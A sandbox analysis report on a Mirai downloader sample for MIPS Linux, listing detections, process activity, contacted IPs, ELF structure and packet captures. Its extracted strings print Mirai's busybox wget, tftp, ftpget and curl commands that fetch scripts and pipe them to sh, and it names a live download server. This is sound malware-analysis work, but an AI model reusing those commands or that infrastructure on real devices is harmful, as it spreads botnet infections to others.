Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.mips.elf

Overview

General Information

Sample name:dlr.mips.elf
Analysis ID:1579229
MD5:0ee93d0dc90f877daeb90d5488e08d3f
SHA1:5d5c37275d7ab730c28d149fb356f9f9d713d45f
SHA256:263809d8a0ce73d8e933ea7ee3aa7fe621cf375a63ff6ecfcfa1fa5dfaa4ff43
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579229
Start date and time:2024-12-21 06:11:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.mips.elf
Detection:MAL
Classification:mal64.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/dlr.mips.elf
PID:6252
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
NIGGY
RAY
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6224, Parent: 4331)
  • rm (PID: 6224, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.EBrSfcrRYz /tmp/tmp.lNgNKUxc5s /tmp/tmp.xevoaEOA6J
  • dash New Fork (PID: 6225, Parent: 4331)
  • rm (PID: 6225, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.EBrSfcrRYz /tmp/tmp.lNgNKUxc5s /tmp/tmp.xevoaEOA6J
  • dlr.mips.elf (PID: 6252, Parent: 6153, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/dlr.mips.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
/tmp/GalaxyJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: /tmp/GalaxyAvira: detection malicious, Label: EXP/ELF.Agent.J.8
    Source: dlr.mips.elfReversingLabs: Detection: 39%
    Source: Galaxy.16.drString: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
    Source: global trafficHTTP traffic detected: GET /mips HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: global trafficHTTP traffic detected: GET /mips HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
    Source: Galaxy.16.drString found in binary or memory: http:///curl.sh
    Source: Galaxy.16.drString found in binary or memory: http:///wget.sh
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal64.troj.linELF@0/1@0/0
    Source: /usr/bin/dash (PID: 6224)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.EBrSfcrRYz /tmp/tmp.lNgNKUxc5s /tmp/tmp.xevoaEOA6JJump to behavior
    Source: /usr/bin/dash (PID: 6225)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.EBrSfcrRYz /tmp/tmp.lNgNKUxc5s /tmp/tmp.xevoaEOA6JJump to behavior
    Source: /tmp/dlr.mips.elf (PID: 6252)File written: /tmp/GalaxyJump to dropped file
    Source: /tmp/dlr.mips.elf (PID: 6252)Queries kernel information via 'uname': Jump to behavior
    Source: dlr.mips.elf, 6252.1.0000558f496de000.0000558f49765000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
    Source: dlr.mips.elf, 6252.1.0000558f496de000.0000558f49765000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
    Source: dlr.mips.elf, 6252.1.00007ffc31d0b000.00007ffc31d2c000.rw-.sdmpBinary or memory string: k]`x86_64/usr/bin/qemu-mips/tmp/dlr.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.mips.elf
    Source: dlr.mips.elf, 6252.1.00007ffc31d0b000.00007ffc31d2c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/Galaxy, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/Galaxy, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path Interception1
    File Deletion
    OS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    dlr.mips.elf39%ReversingLabsLinux.Downloader.Mirai
    SourceDetectionScannerLabelLink
    /tmp/Galaxy100%AviraEXP/ELF.Agent.J.8
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http:///wget.shGalaxy.16.drfalse
      high
      http:///curl.shGalaxy.16.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        37.44.238.94
        unknownFrance
        49434HARMONYHOSTING-ASFRfalse
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.43
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        37.44.238.94dlr.mpsl.elfGet hashmaliciousMiraiBrowse
        • /mpsl
        dlr.arm6.elfGet hashmaliciousUnknownBrowse
        • /arm6
        109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
        • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
        91.189.91.43m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
          dlr.arm6.elfGet hashmaliciousUnknownBrowse
            mips.elfGet hashmaliciousMiraiBrowse
              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                boatnet.i686.elfGet hashmaliciousMiraiBrowse
                  boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                      boatnet.arm.elfGet hashmaliciousMiraiBrowse
                        arm6.elfGet hashmaliciousMiraiBrowse
                          dbus.elfGet hashmaliciousUnknownBrowse
                            91.189.91.42m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                mips.elfGet hashmaliciousMiraiBrowse
                                  la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                    boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                      boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                        boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                          boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                            arm6.elfGet hashmaliciousMiraiBrowse
                                              dbus.elfGet hashmaliciousUnknownBrowse
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CANONICAL-ASGBm68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                CANONICAL-ASGBm68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 91.189.91.42
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 185.125.190.26
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                INIT7CHm68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 109.202.202.202
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                arm6.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                dbus.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                HARMONYHOSTING-ASFRdlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 37.44.238.94
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 37.44.238.94
                                                8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 37.44.238.250
                                                roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.armv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                roze.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 37.44.238.73
                                                No context
                                                No context
                                                Process:/tmp/dlr.mips.elf
                                                File Type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                Category:dropped
                                                Size (bytes):105780
                                                Entropy (8bit):5.505833357602903
                                                Encrypted:false
                                                SSDEEP:1536:CyF0CMjfjpLICVxlK+lKrwKcivSK5ApwOCW3vTVeYQIBrqni8VRqE:e9BLjVe5ApwOCWfThrqni3E
                                                MD5:80C687E90213617F61028DD7C60DDBA1
                                                SHA1:BA052852CBEAE9D7D4E58FCFD66EA9A1BFA28753
                                                SHA-256:F831A6D5224FB9B2D83E085578158F5EE035D4410F08C193BFF9FAA08D589730
                                                SHA-512:81FEDEE611AE3542B4E41EB2C3EB7328C0B9AA10BFC11D28C4729D809BBFBA0360A431440157889563EA59AB16D0A91F18E4961C8BD7CDF50BFAADCD5647AEF4
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/Galaxy, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Reputation:low
                                                Preview:.ELF.....................@.`...4.........4. ...(.............@...@.....p...p.................E...E........\H........dt.Q............................<...'......!'.....................<...'......!... ....'9... ......................<...'......!...$....'9f`. ..........................'.. <...'......!'..... .....................".......@.......................Y....... ..$B... ...............Y....... ..$B...........@..$................ ..$..p....$....".... ............'..(<...'......!'.........................$..p.@..$.... ...............................@..$.... ........... ..'.. ............'.. .......!........<...'..D...!...!...0....'...$......$'..............................X..... ..........................<...'......!'.....0...,...(...$... ...................!..!0...0......K. ..$........P.......@.........0...,...(...$... ............'..8......... ...........P.......@.............L. ....................... ...........@ !...@..... ..$..............0..... .... !...X..... ..........
                                                File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):4.666202346472876
                                                TrID:
                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                File name:dlr.mips.elf
                                                File size:1'984 bytes
                                                MD5:0ee93d0dc90f877daeb90d5488e08d3f
                                                SHA1:5d5c37275d7ab730c28d149fb356f9f9d713d45f
                                                SHA256:263809d8a0ce73d8e933ea7ee3aa7fe621cf375a63ff6ecfcfa1fa5dfaa4ff43
                                                SHA512:eb38a22411dade42697ca54db0d1b35b8ba9c0179b1162f2bb4f7550e2850349768fa33140cd611b966edc4782eddd52f707bbfed187ac6b94e83751e75cc742
                                                SSDEEP:24:3u4dsgph8AmsiRD8AmyT/z2HdllP8WzqtWB4u37I8paXDdz3N9l5zBkEp7ilAGnb:exgpEuQ2H7mWz1EXD/9LuEp8nn27qxMM
                                                TLSH:6E41CC8E1F714EF8F559D93887374B3527AE924847C04249E2ACDA406EC430D89AEBE9
                                                File Content Preview:.ELF.....................@.....4.........4. ...(.............@...@..... ... ............... .D. .D. ...T...p........dt.Q........................................0.....,...&... %0...0..... %.........D.%<...'..H...!...\..(!. ..$...<...'..,...!...\..(!. ..$..

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, big endian
                                                Version:1 (current)
                                                Machine:MIPS R3000
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x4004c0
                                                Flags:0x1007
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:3
                                                Section Header Offset:1704
                                                Section Header Size:40
                                                Number of Section Headers:7
                                                Header String Table Index:6
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .textPROGBITS0x4000a00xa00x5400x00x6AX0016
                                                .rodataPROGBITS0x4005e00x5e00x400x10x32AMS004
                                                .gotPROGBITS0x4406200x6200x540x40x10000003WAp0016
                                                .bssNOBITS0x4406800x6740x100x00x3WA0016
                                                .mdebug.abi32PROGBITS0x480x6740x00x00x0001
                                                .shstrtabSTRTAB0x00x6740x310x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x4000000x4000000x6200x6204.96800x5R E0x10000.text .rodata
                                                LOAD0x6200x4406200x4406200x540x702.40960x6RW 0x10000.got .bss
                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 21, 2024 06:12:02.483767986 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:02.605195045 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:02.605427027 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:02.606755972 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:02.726453066 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875627041 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875766039 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875803947 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875843048 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875858068 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.875858068 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.875880957 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875890970 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.875890970 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.875920057 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875950098 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.875957966 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.875993967 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.875997066 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.876034021 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.876035929 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.876035929 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.876071930 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.876080990 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.876111031 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.996180058 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.996236086 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:03.996248960 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:03.996279001 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.067497969 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.067552090 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.067703009 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.067748070 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.071844101 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.071893930 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.071964979 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.072011948 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.080085039 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.080193043 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.080590010 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.088479996 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.088612080 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.088696003 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.096898079 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.097012997 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.098406076 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.105504036 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.105556965 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.106951952 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.113976002 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.114069939 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.115020037 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.122178078 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.122329950 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.123069048 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.130697012 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.130812883 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.131232023 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.139123917 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.139167070 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.139355898 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.146639109 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.146785021 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.147413015 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.259274006 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.259294033 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.260638952 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.261543036 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.262578011 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.262684107 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.263859987 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.267558098 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.267663956 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.268702030 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.272587061 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.272706985 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.273533106 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.277597904 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.277784109 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.278362036 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.282457113 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.282618999 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.283241987 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.287200928 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.287311077 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.287358046 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.292006969 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.292093992 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.293189049 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.296833992 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.297034025 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.298022032 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.301610947 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.301820993 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.302819014 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.306498051 CET804268437.44.238.94192.168.2.23
